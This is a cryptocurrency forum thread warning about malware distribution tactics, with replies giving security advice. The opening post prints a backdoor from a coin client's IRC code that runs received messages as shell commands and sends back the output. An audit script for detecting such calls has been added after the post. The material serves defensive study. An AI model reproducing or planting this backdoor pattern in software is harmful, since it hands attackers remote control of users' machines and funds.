Bitcoin Forum
December 17, 2017, 10:38:27 PM *
Topic: Beware of Increasingly Sophisticated Malware Infection Attempts (Read 138998 times)
grue
Global Moderator, Legendary
Activity: 2058
January 25, 2015, 10:33:22 PM  #1

In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
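Here is the source code with macros resolved:
Code:
// Trigger: an IRC PRIVMSG whose text begins with the word "!"
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The rest of the received line is handed to popen(), i.e. run as a shell command
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        // Collect the command's output
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // Extract the sender's nick from the ":nick!user@host" prefix
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // Send the output back to the sender as a PRIVMSG
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}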
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

It is pitch black. You are likely to be eaten by a grue.
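
A source-audit sketch for the macro trick shown in the post above, added here as an example; it is not part of the original thread or of the coin's source. It resolves `#define` aliases (including chained ones) and reports call sites that expand to a process-execution function. The `#define` lines in the sample are constructed, since the post shows only the macro names and what they resolve to, and `EXEC_FUNCS`, `Finding` and `scan` are names chosen for this example.

```python
import re
from typing import NamedTuple

# Functions that start a process or shell. Any use inside networking or
# bootstrap code of a wallet deserves manual review.
EXEC_FUNCS = frozenset({
    "popen", "_popen", "system",
    "execl", "execlp", "execle", "execv", "execvp", "execve",
    "WinExec", "ShellExecuteA", "ShellExecuteW",
    "CreateProcessA", "CreateProcessW",
})

# Single-line object-like or function-like macros. Multi-line macros and
# /* block comments */ are not handled by this sketch.
DEFINE_RE = re.compile(r"^\s*#\s*define\s+([A-Za-z_]\w*)(?:\([^)]*\))?\s+(.+?)\s*$")
STRING_RE = re.compile(r'"(?:\\.|[^"\\])*"')
IDENT_RE = re.compile(r"[A-Za-z_]\w*")
CALL_RE = re.compile(r"\b([A-Za-z_]\w*)\s*\(")


class Finding(NamedTuple):
    line: int          # 1-based line number of the call site
    name: str          # identifier as written in the source
    resolves_to: str   # process-execution function it expands to
    via_macro: bool    # True when the call is hidden behind a #define
    dynamic_arg: bool  # True when the first argument is not a string literal


def collect_macros(source):
    """Map macro name -> body, with string literals blanked out."""
    macros = {}
    for line in source.splitlines():
        m = DEFINE_RE.match(line)
        if m:
            macros[m.group(1)] = STRING_RE.sub('""', m.group(2))
    return macros


def resolve(name, macros, seen=None):
    """Return the exec function `name` expands to (following chains), or None."""
    if name in EXEC_FUNCS:
        return name
    seen = set() if seen is None else seen
    if name in seen or name not in macros:
        return None  # unknown identifier, or a macro cycle
    seen.add(name)
    for ident in IDENT_RE.findall(macros[name]):
        hit = resolve(ident, macros, seen)
        if hit:
            return hit
    return None


def scan(source):
    """Report every call site that ends up in a process-execution function."""
    macros = collect_macros(source)
    findings = []
    for lineno, raw in enumerate(source.splitlines(), 1):
        if DEFINE_RE.match(raw):
            continue  # definitions are reported through their call sites
        # Blank string literals first so "//" or "system(" inside them is ignored.
        code = STRING_RE.sub('""', raw).split("//", 1)[0]
        for m in CALL_RE.finditer(code):
            target = resolve(m.group(1), macros)
            if target:
                first_arg = code[m.end():].lstrip()
                findings.append(Finding(lineno, m.group(1), target,
                                        m.group(1) != target,
                                        not first_arg.startswith('""')))
    return findings


# Constructed sample: the #define lines are assumed; the call site follows the post.
SAMPLE = '''\
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf)
        CFree(buf);
}
printf("system(ready) popen(");  // string contents must not be flagged
int rc = system("date");         // direct call with a constant argument
'''

if __name__ == "__main__":
    for f in scan(SAMPLE):
        kind = "macro alias" if f.via_macro else "direct call"
        arg = "dynamic argument" if f.dynamic_arg else "literal argument"
        print(f"line {f.line}: {f.name} -> {f.resolves_to} ({kind}, {arg})")
```

A hit with `via_macro` and `dynamic_arg` both set, as for the `CRead` call, is the combination to read first: the function name is hidden and its argument is not a constant.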

Rolandvoda
Member
Activity: 109
January 29, 2015, 05:10:56 AM  #2

Could you please post the coin's name and maybe others that you may have found ?

muhrohmat
Sr. Member
Activity: 252
January 31, 2015, 07:33:18 AM  #3

Correct me if I'm wrong, but malware is generically for executables in Windows, no? I mean the wallets are, but is Kaspersky not enough?
If not, why do we need to protect from the case of retrieving passwords from the users and other stuff from even pen drives with wallets (including the common coins ones) like doge, ltc, btc and a few more.

garmin
Hero Member
Activity: 506
February 03, 2015, 12:08:47 AM  #4

I was checking some IRC bootstrap connections and found some additional info.

Kinda looks ripe for the picking by an exploit.

https://bitcointalk.org/index.php?topic=943519.new#new

 Undecided

crazyideas21
Jr. Member
Activity: 33
Researcher at Univ of California San Diego
February 11, 2015, 12:45:31 AM  #5

I'm adding this to the list of possible scams:

https://bitcointalk.org/index.php?topic=951827.0

TrinityCoin
Sr. Member
Activity: 264
February 11, 2015, 04:31:57 AM  #6

Could you please post the coin's name and maybe others that you may have found ?

This is found in the "Lucky7coin" source code, as linked above.

shavers
Sr. Member
Activity: 343
February 14, 2015, 10:04:48 PM  #7

I'd like to add the bitcoinwisdomapp.com to the blacklist. It's a keylogger behind it.

But how will you ever die one day, Narcissus, if you have no mother?

Hippie Tech
aka Amenstop
Legendary
Activity: 1456
All cryptos are FIAT digital currency. Do not use.
February 17, 2015, 05:40:48 AM  #8

Any thoughts ?

EDIT
SPR, ORB and at least one or two other coins are using this faucet/ block explorer site.

BE VERY WARY OF THE MULTIFAUCET BLOCK EXPLORER !

I searched for an address and was left with having to fight virus scan pop ups for a few minutes.

crazyideas21
Jr. Member
Activity: 33
Researcher at Univ of California San Diego
February 17, 2015, 05:54:00 AM  #9

The multifaucet.tk wallet search would redirect you to a third-party ad network. Subsequently, the ad network would redirect you to the destination page -- which, in this case, is the result of the wallet search. I'm in California; the ad network being shown is adf.ly. Depending on your geographic location, you may get a different ad network. These third-party sites generate revenue for multifaucet upon every ad view. This is paid for by the ad publisher. However, multifaucet has no control of what ads are being shown. To maximize their profits, ad publishers may show ads that may lead to malware, which promises higher margins than conventional ads.

In my case, I encountered the following page:

Hippie Tech
aka Amenstop
Legendary
Activity: 1456
All cryptos are FIAT digital currency. Do not use.
February 17, 2015, 06:04:20 AM  #10

In my case, IE11 was completely locked up and I had to be fast with the "end process" clicks.

I've never had my browser hijacked like this. That is unless we count AMD's user surveys they keep imposing on us after a driver install. lol

Gabe
Jr. Member
Activity: 38
February 18, 2015, 07:30:11 PM  #11

That's terrible. Anyone of you encountered the ransom cryptolocker? I heard about it not long ago. What is wrong with people?

fartbags
Legendary
Activity: 1176
March 03, 2015, 01:18:57 AM  #12

Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?

crazyideas21
Jr. Member
Activity: 33
Researcher at Univ of California San Diego
March 03, 2015, 01:23:24 AM  #13

Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?

Yes, that would be one solution.

Decksperiment
Sr. Member
Activity: 378
Uniting the Power of Sound & Ceation
March 03, 2015, 04:14:52 AM  #14

Wow.. this is like so pointless (not the thread, the 'hack') nowadays.. why not just place a keylogger in bios, then no matter what os folks use, you have 100% access to whatever machines are connected?

Edit: Hint: Speedracer.

BTC: 1654DECHaU4QyYXom9ooRBvt2zmULR3MfZ

dooglus
Legendary
Activity: 2366
March 08, 2015, 07:37:28 PM  #15

Edit: Hint: Speedracer.

http://events.ccc.de/congress/2014/Fahrplan/system/attachments/2565/original/speed_racer_whitepaper.pdf

Just-Dice | Play or Invest | 1% House Edge

bitsat alien
Full Member
Activity: 122
March 13, 2015, 06:32:45 AM  #16

Thanks for being on top of this and keeping us informed, we do appreciate it!

Decksperiment
Sr. Member
Activity: 378
Uniting the Power of Sound & Ceation
March 13, 2015, 04:03:26 PM  #17


Lol, this was just the beginning, If I can put a keylogger in my 64mb lappy bios.. I can do it with anyone..

Keep in mind this hack was released solely by them to LOCKDOWN your bios so you cant tamper with overclocking your machine.. the security they released after this demonstration is exactly how they get into your bios as only the NSA would LOVE.

Edit: There is need for a new style of bios security, like anti virus, which, when your bios gets bigger, can load in bios FIRST, before bios is loaded.. it's not as hard as you think, but I'm not THAT good..

BTC: 1654DECHaU4QyYXom9ooRBvt2zmULR3MfZ

AshCoiner
Newbie
Activity: 10
March 31, 2015, 03:52:25 AM  #18

I just received something like this an hour ago.  I was surfing Ebay and laughed when I saw PimpCash.  Having to see if it was real, I went to pimpcash.com. Immediately something like what you showed came up.  However, for me, it pretended to be my service provider and gave me a number to call.  I confess I did try to call but the ring didn't sound right.  Sounded like an old telephone.  I hung up and rebooted my computer.  Things seem to be ok now.  I ran a quick scan and all seems to be okay.  Is there anything else I should do to check to see if my computer is okay?

Any thoughts ?

EDIT
SPR, ORB and at least one or two other coins are using this faucet/ block explorer site.

BE VERY WARY OF THE MULTIFAUCET BLOCK EXPLORER !

I searched for an address and was left with having to fight virus scan pop ups for a few minutes.

Hippie Tech
aka Amenstop
Legendary
Activity: 1456
All cryptos are FIAT digital currency. Do not use.
April 01, 2015, 11:39:02 PM  #19

Please check your "program files(x86)" and the youruser/appdata/local/TEMP folders ! The ASN client is a remote desktop hack !

https://bitcointalk.org/index.php?topic=984878.msg10951987#msg10951987




ed_teech
Hero Member
Activity: 507
Jahaha
April 10, 2015, 09:22:12 PM  #20

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.

Hippie Tech
aka Amenstop
Legendary
Activity: 1456
All cryptos are FIAT digital currency. Do not use.
April 10, 2015, 11:28:02 PM  #21

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.

Or any noob with access to it.

How to detect RAT (remote admin tool) --> https://youtu.be/btn9nWE3X7o

Hazard
Legendary
Activity: 994
Internet Celebrity
April 15, 2015, 03:02:04 PM  #22

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
I'm surprised we haven't seen a more concerted effort, honestly.

Hippie Tech
aka Amenstop
Legendary
Activity: 1456
All cryptos are FIAT digital currency. Do not use.
April 15, 2015, 11:32:44 PM  #23

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
I'm surprised we haven't seen a more concerted effort, honestly.

What makes you say that ?

Is there a way to detect files that have malware binded to them ?

mullick
Legendary
Activity: 952
April 23, 2015, 05:30:31 AM  #24

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.

Or any noob with access to it.

How to detect RAT (remote admin tool) --> https://youtu.be/btn9nWE3X7o


I get about 1-3 emails a month with a RAT as an attachment. The most recent of which seems to be smart enough to detect they are in a vm. Mostly java based meaning they affect Unix/Linux machines as well as Windows

Keep java off any machine you store crypto on. That should be a no brainer

Hippie Tech
aka Amenstop
Legendary
Activity: 1456
All cryptos are FIAT digital currency. Do not use.
April 23, 2015, 01:27:15 PM  #25

Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.

Or any noob with access to it.

How to detect RAT (remote admin tool) --> https://youtu.be/btn9nWE3X7o


I get about 1-3 emails a month with a RAT as an attachment. The most recent of which seems to be smart enough to detect they are in a vm. Mostly java based meaning they affect Unix/Linux machines as well as Windows

Keep java off any machine you store crypto on. That should be a no brainer



Yes.. say NO to Java and.. very sneaky redirects. Wink

Hover over the windows download link and you'll see the GitHub addy. Click it and you'll be redirected to this :

8.06MB


2.90MB EDIT -> You must copy n paste the shortcut onto a new tab if you want to visit the GitHub page.


Huh Huh


deadp00l
Member
Activity: 72
April 25, 2015, 03:02:55 PM  #26

How to keep your home computer malware free.
 
How could it happen?
Clicking a link or attachment in email.
Visiting a website that has malware installed. Depending on your browser settings and what plug-ins you have installed (Flash, Java, Acrobat Reader) malicious software could be installed on your computer without your knowledge.
 
What could happen?
You could lose all the data on your computer.
All the data on your computer could be held for ransom.
Your computer could be used to commit crimes.
Your personal information could be stolen.
Someone could access all of your accounts.
Someone could log everything you type.
Someone could access all the files on your computer.
 
Prevention
Update your operating system and third party applications.
http://secunia.com/vulnerability_scanning/personal/
 
Disable auto run for Plug-Ins
In Google Chrome navigate to chrome://settings/content.
Under Plug-ins select Click to play.
You can add exceptions by going to chrome://settings/content, Plug-ins, and clicking "Manage exceptions..."
 
Use a DNS server that blocks known malicious sites
Symantec https://dns.norton.com/
Comodo https://www.comodo.com/secure-dns/
 
Use Windows Defender on Windows 8 or Microsoft Security Essentials on Windows 7
They are free and effective.
 
Buy and install MalwareBytes Premium and Malware Bytes Anti-Exploit Premium ($25 Each)
 
Be suspicious about links and attachments in emails. Don't click them.
 
Backup your data
Use BitTorrent Sync to sync your data with another computer.
Use an application like Acronis TruImage to make a scheduled backup to an external drive. Get two external drives and rotate them regularly. Keep one copy at a different location.
Use a cloud based backup service like Carbonite, Crashplan or Backblaze.
 
Consider replacing your current router with a UTM (Unified Threat Management) firewall that has security software built in. Note that most of these are relatively expensive and require ongoing subscriptions.
Example http://www.asus.com/support/FAQ/1008719/

Be careful with remote access to your PC
Don't use VNC to remotely access your PC. Passwords are easily brute forced via automated scanning scripts. For best security consider two-factor authentication.

chases
Full Member
Activity: 186
ain't nothing like the Blues
May 11, 2015, 10:51:41 PM  #27

Thanks everyone Grin a lot of great informative and useful information here! excellent job

100110100011010011

melody82
Sr. Member
Activity: 350
May 29, 2015, 06:31:51 PM  #28

So just to be clear, I can get hacked without downloading anything but just by visiting a naughty site?  And I should uninstall acrobat, java and flash altogether?  Wow thanks for this information.

Another question, I have Norton 360, but is malwarebytes that much better? 

And thanks for this thread.  Many of us don't know all that much about these threats so thanks for educating us.

BIT-Sharon
Sr. Member
Activity: 266
June 01, 2015, 03:06:43 AM  #29

may be one is just forwarding the posts of malware without distinguish, we have to differ according to this article.

joter85
Sr. Member
Activity: 343
Crypto-Games.net: #1 Gambling Site
June 02, 2015, 12:03:29 PM  #30

Best thing would be to setup a PC to use only for Bitcoin transactions?   Grin


 

 
superresistant
Legendary
Activity: 1680
June 03, 2015, 07:32:00 PM  #31

So just to be clear, I can get hacked without downloading anything but just by visiting a naughty site?  And I should uninstall acrobat, java and flash altogether?  Wow thanks for this information.

Yes you can get hacked visiting a website because your browser (Internet Explorer/Chrome/Firefox...) executes scripts by default.
The solution against it is to use the NoScript plugin in Firefox: it will block every script and make browsing much safer. You'll need to check and authorize scripts one by one. If anything is suspicious, you can get away without damage.

Another question, I have Norton 360, but is malwarebytes that much better?
And thanks for this thread.  Many of us don't know all that much about these threats so thanks for educating us.

Antiviruses cannot detect new viruses or specific crypto malware.
They only protect from known viruses.

The solution to be safe is to use Linux (Ubuntu for example) for anything related to crypto.
Viruses developed for Windows cannot target Linux.
Linux users can still get targeted through the Internet browser, that's why you should use NoScript too.

Here's my bag so you don't ask : Bitcoin, tenX, iexec, byteball and pepecash

johnbrainless
Sr. Member
Activity: 280
June 09, 2015, 04:09:43 PM  #32

be careful people

♝ Pandacoin   ♝ Buy With Paypal Or Credit Card ♝ FaceBook tipping ♝ Irc channel #DigitalPandacoin with tipbot
✬ Earn 2.5% Annual Interest ✬ Active Dev Team ✬ Blazing Fast Multi Mode Wallet ✬ Paper Wallet ✬ No premine or IPO ✬
☠☠☠☠☠☠☠ PANDACOINPND (´(ェ)`) Digital Pandacoin (´(ェ)`) PANDACOINPND ☠☠☠☠☠☠☠

melody82
Sr. Member
Activity: 350
June 11, 2015, 05:57:03 AM  #33

So just to be clear, I can get hacked without downloading anything but just by visiting a naughty site?  And I should uninstall acrobat, java and flash altogether?  Wow thanks for this information.

Yes you can get hacked visiting a website because your browser (Internet Explorer/Chrome/Firefox...) executes scripts by default.
The solution against it is to use the NoScript plugin in Firefox: it will block every script and make browsing much safer. You'll need to check and authorize scripts one by one. If anything is suspicious, you can get away without damage.

Another question, I have Norton 360, but is malwarebytes that much better?
And thanks for this thread.  Many of us don't know all that much about these threats so thanks for educating us.

Antiviruses cannot detect new viruses or specific crypto malware.
They only protect from known viruses.

The solution to be safe is to use Linux (Ubuntu for example) for anything related to crypto.
Viruses developed for Windows cannot target Linux.
Linux users can still get targeted through the Internet browser, that's why you should use NoScript too.

Thanks for the explanation!  I am thinking of getting a computer dedicated to just crypto transactions after reading this.  It seems like no matter how careful you are there is always a danger.

Hippie Tech
aka Amenstop
Legendary
Activity: 1456
All cryptos are FIAT digital currency. Do not use.
June 12, 2015, 10:57:38 PM  #34

WARNING !! This client is making outbound connections to known malware and/or phishing sites.


http://www.urlquery.net/report.php?id=1434020970582

The "Recent reports on same IP/ASN/Domain" section shows other suspicious sites/links.
https://www.virustotal.com/en/url/946ac3207509fb493eaf2e02e107b97cc03513cb373bb007a8a61b9b6b0fe61c/analysis/1434120962/

Now let's see what the debug.log has to say...
Code:
2015-06-12 12:41:10 connection timeout
2015-06-12 12:41:11 trying connection 77.249.89.46:9748 lastseen=1802.3hrs
2015-06-12 12:41:16 connection timeout
2015-06-12 12:41:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:41:22 connection timeout
2015-06-12 12:41:22 trying connection 82.238.124.41:9748 lastseen=33.6hrs
2015-06-12 12:41:27 connection timeout
2015-06-12 12:41:28 trying connection 77.85.35.151:9748 lastseen=170.7hrs
2015-06-12 12:41:33 connection timeout
2015-06-12 12:41:33 trying connection 137.135.57.119:9748 lastseen=27.6hrs
2015-06-12 12:41:38 connection timeout
2015-06-12 12:41:39 trying connection 96.54.4.190:9748 lastseen=21.7hrs
2015-06-12 12:41:44 connection timeout
2015-06-12 12:41:44 trying connection 87.154.210.76:9748 lastseen=378.8hrs
2015-06-12 12:41:49 connection timeout
2015-06-12 12:41:50 trying connection 103.230.107.12:9748 lastseen=2166.3hrs
2015-06-12 12:41:55 connection timeout
2015-06-12 12:41:55 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:00 connection timeout
2015-06-12 12:42:01 trying connection 62.157.39.12:9748 lastseen=2675.3hrs
2015-06-12 12:42:06 connection timeout
2015-06-12 12:42:06 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:11 connection timeout
2015-06-12 12:42:12 trying connection 162.255.117.105:9748 lastseen=52.5hrs
2015-06-12 12:42:17 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:22 connection timeout
2015-06-12 12:42:23 trying connection 71.100.135.84:9748 lastseen=16.9hrs
2015-06-12 12:42:28 connection timeout
2015-06-12 12:42:28 trying connection 5.139.143.81:9748 lastseen=3461.6hrs
2015-06-12 12:42:33 connection timeout
2015-06-12 12:42:34 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:39 connection timeout
2015-06-12 12:42:39 trying connection 104.219.250.234:9748 lastseen=7.2hrs
2015-06-12 12:42:44 connection timeout
2015-06-12 12:42:45 trying connection 87.154.214.25:9748 lastseen=2063.7hrs
2015-06-12 12:42:50 connection timeout
************************************************************
2015-06-12 12:42:50 trying connection 104.219.250.234:9748 lastseen=7.2hrs**
************************************************************
2015-06-12 12:42:55 connection timeout
2015-06-12 12:42:56 trying connection 80.57.229.215:9748 lastseen=115.2hrs
2015-06-12 12:43:01 connection timeout
2015-06-12 12:43:01 trying connection 77.232.5.253:9748 lastseen=1191.0hrs

Report for the address, 104.xxx.xxx.234, :
http://www.urlquery.net/report.php?id=1434121818636

And one of its suspicious links/sites :
https://www.virustotal.com/en/url/3b1a7af045bdc8005e8243f65d203df04ba8d43f9e10fd39af1004aad75da0ed/analysis/1434122387/

maheshmahi
Jr. Member
Activity: 56
June 19, 2015, 02:54:55 PM  #35

All of them use only keylogger
Can we ensure safety to our wallet.

MaryJ
Sr. Member
Activity: 305
Managing Director of Maryjanecoin LLC
July 03, 2015, 10:45:26 AM  #36

not good to see

Maryjanecoin.org

wolfwere
Newbie
Activity: 9
August 05, 2015, 04:51:38 PM  #37

man, this is terribly scary!

TransaDox
Full Member
Activity: 219
August 06, 2015, 08:54:31 PM  #38

Edit: There is need for a new style of bios security, like anti virus, which, when your bios gets bigger, can load in bios FIRST, before bios is loaded.. it's not as hard as you think, but I'm not THAT good..
Or they could just put a small mechanical switch in like the dip switches they used to put on the motherboard years ago. Problem solved.

jackg
Legendary
Activity: 854
1JRmjyGo3kpdXcQeAeTBmGtgkC1AomHKED
August 27, 2015, 10:40:24 AM  #39

Correct me if I'm wrong, but malware is generically for executables in Windows, no? I mean the wallets are, but is Kaspersky not enough?
If not, why do we need to protect from the case of retrieving passwords from the users and other stuff from even pen drives with wallets (including the common coins ones) like doge, ltc, btc and a few more.

Malware can still be coded on Linux and can be hidden inside programs. Linux needs more permissions, but if you allow the program to run, then you allow the malware to run and harm your computer whether it is Linux or Mac!

jackg
Legendary
Activity: 854
1JRmjyGo3kpdXcQeAeTBmGtgkC1AomHKED
August 27, 2015, 10:42:38 AM  #40

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

groggin
Legendary
Activity: 1442
August 27, 2015, 08:14:06 PM  #41

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity  |  Sign-up @ Aurovine to get FREE HD music ... and coins!|  *TIPs*  | VNL  Vkpn45TSLR1jBa34pyrTwWDzADTEyviz4E   | TALK   CXvZkT13CNjn3ScizW1oEHWNVEAduJuKCJ   |   BTC   18wWrEfcA62D5Xmza1rRAw5cgcqwCa2YFH   |    ELP  e7rPHqbczFnUdyBk2XEdm9tj4fqjGnCqK4     Buy - Sell on          Cryptopia  |  Bleutrade   |    Poswallet     |  an experiment in trust and control - FLYcoin   |   FATiB27UfQyySJCyM1dEQTaxMdZgqxHZ4y

jackg
Legendary
Activity: 854
1JRmjyGo3kpdXcQeAeTBmGtgkC1AomHKED
August 27, 2015, 08:26:49 PM  #42

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

I'm not great at reading binary code: as that is what the .exe extension usually means, is there a better way to read programs?

BitcoinNewsMagazine
Legendary
Activity: 994
August 27, 2015, 08:38:14 PM  #43

How to keep your home computer malware free.
 
How could it happen?
Clicking a link or attachment in email.
Visiting a website that has malware installed. Depending on your browser settings and what plug-ins you have installed (Flash, Java, Acrobat Reader) malicious software could be installed on your computer without your knowledge.
 
What could happen?
You could lose all the data on your computer.
All the data on your computer could be held for ransom.
Your computer could be used to commit crimes.
Your personal information could be stolen.
Someone could access all of your accounts.
Someone could log everything you type.
Someone could access all the files on your computer.
 
Prevention
Update your operating system and third party applications.
http://secunia.com/vulnerability_scanning/personal/
 
Disable auto run for Plug-Ins
In Google Chrome navigate to chrome://settings/content.
Under Plug-ins select Click to play.
You can add exceptions by going to chrome://settings/content, Plug-ins, and clicking "Manage exceptions..."
 
Use a DNS server that blocks known malicious sites
Symantec https://dns.norton.com/
Comodo https://www.comodo.com/secure-dns/
 
Use Windows Defender on Windows 8 or Microsoft Security Essentials on Windows 7
They are free and effective.
 
Buy and install MalwareBytes Premium and Malware Bytes Anti-Exploit Premium ($25 Each)
 
Be suspicious about links and attachments in emails. Don't click them.
 
Backup your data
Use BitTorrent Sync to sync your data with another computer.
Use an application like Acronis TruImage to make a scheduled backup to an external drive. Get two external drives and rotate them regularly. Keep one copy at a different location.
Use a cloud based backup service like Carbonite, Crashplan or Backblaze.
 
Consider replacing your current router with a UTM (Unified Threat Management) firewall that has security software built in. Note that most of these are relatively expensive and require ongoing subscriptions.
Example http://www.asus.com/support/FAQ/1008719/

Be careful with remote access to your PC
Don't use VNC to remotely access your PC. Passwords are easily brute forced via automated scanning scripts. For best security consider two-factor authentication.

Good advice to take to heart, thanks for taking the time to post.

groggin
Legendary
*
Offline Offline

Activity: 1442



View Profile
August 27, 2015, 10:42:49 PM
 #44

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

I'm not great at reading binary code: as that is what the .exe extension usually means, is there a better way to read programs?

(disclaimer: i am no expert here)
  source code is human readable, you don't have to be a programmer to look at it, neither do you have to fully understand all the nuances of an executable to see if it might be malicious.

 check out github
https://github.com/explore

wean yourself from Windows if you haven't already
i like to dual-boot: when i start my pc i can choose win or lin. i always prefer linux but sometimes i'm stuck with 'doz
open source is awesome
it is the life blood of digital liberty imo.  Cheesy

 
 

loose the sword that is your pen or tongue [or bittorrent enabled computer] and help fight the so-called new world order   it is the enemy of humanity  |  Sign-up @ Aurovine to get FREE HD music ... and coins!|  *TIPs*  | VNL  Vkpn45TSLR1jBa34pyrTwWDzADTEyviz4E   | TALK   CXvZkT13CNjn3ScizW1oEHWNVEAduJuKCJ   |   BTC   18wWrEfcA62D5Xmza1rRAw5cgcqwCa2YFH   |    ELP  e7rPHqbczFnUdyBk2XEdm9tj4fqjGnCqK4     Buy - Sell on          Cryptopia  |  Bleutrade   |    Poswallet     |  an experiment in trust and control - FLYcoin   |   FATiB27UfQyySJCyM1dEQTaxMdZgqxHZ4y
jackg
Legendary
*
Offline Offline

Activity: 854

1JRmjyGo3kpdXcQeAeTBmGtgkC1AomHKED


View Profile
August 28, 2015, 03:14:30 PM
 #45

I have also noticed, I was unable to download one of the cryptocurrency cores as it was flagged up as being harmful by norton internet security! This is highly likely with all of the cryptocurrency cores as they are open source which means nothing is protecting them from being hacked and placed onto the cryptocurrency's website in order to attack the computers of many users!

  if programs are open source then you can look at the code yourself, to see whether or not it is malicious. try that with windows or any other closed-source executable

I'm not great at reading binary code: as that is what the .exe extension usually means, is there a better way to read programs?

(disclaimer: i am no expert here)
  source code is human readable, you don't have to be a programmer to look at it, neither do you have to fully understand all the nuances of an executable to see if it might be malicious.

 check out github
https://github.com/explore

wean yourself from Windows if you haven't already
i like to dual-boot: when i start my pc i can choose win or lin. i always prefer linux but sometimes i'm stuck with 'doz
open source is awesome
it is the life blood of digital liberty imo.  Cheesy

 
 

I do quite like linux, I have a raspberry pi b+ which cannot run a lot of operating systems. Is there a way to change the BIOS so that if I have a certain external hard drive connected then it will run from that? I know it is F2 when started up but I don't want to change the factory settings of my laptop

cryptocoinex
Newbie
*
Offline Offline

Activity: 26


View Profile WWW
December 01, 2015, 08:45:22 AM
 #46

Another pretty safe and easy to use program is Deep Freeze.
You can freeze your Windows partition and as soon as you reboot, your pc will go to the state you made when you "freeze" it.
This way no viruses, keyloggers, trojans, RATs, etc. can infect you (as soon as you reboot, the bad stuff is gone).
Downside is that you will have to put the block-chain of any coins you use on the second partition of your harddrive (because you will not be able to update the wallet on the windows partition).

Crypto Coinex ORG
Magnesium Coin
Member
**
Offline Offline

Activity: 70


View Profile
December 07, 2015, 11:54:54 AM
 #47

Won't Norton Internet Security detect the malware if present on a certain wallet?

I have been using NIS (legally bought, not patched) for a long time. Hope it can detect them.

Also they are updating binaries every time with "Virus Definition Updates".

Can anyone confirm the facts by testing any malicious wallet on a PC with NIS previously installed?
HeroCat
Hero Member
*****
Offline Offline

Activity: 658


View Profile
December 16, 2015, 03:22:50 PM
 #48

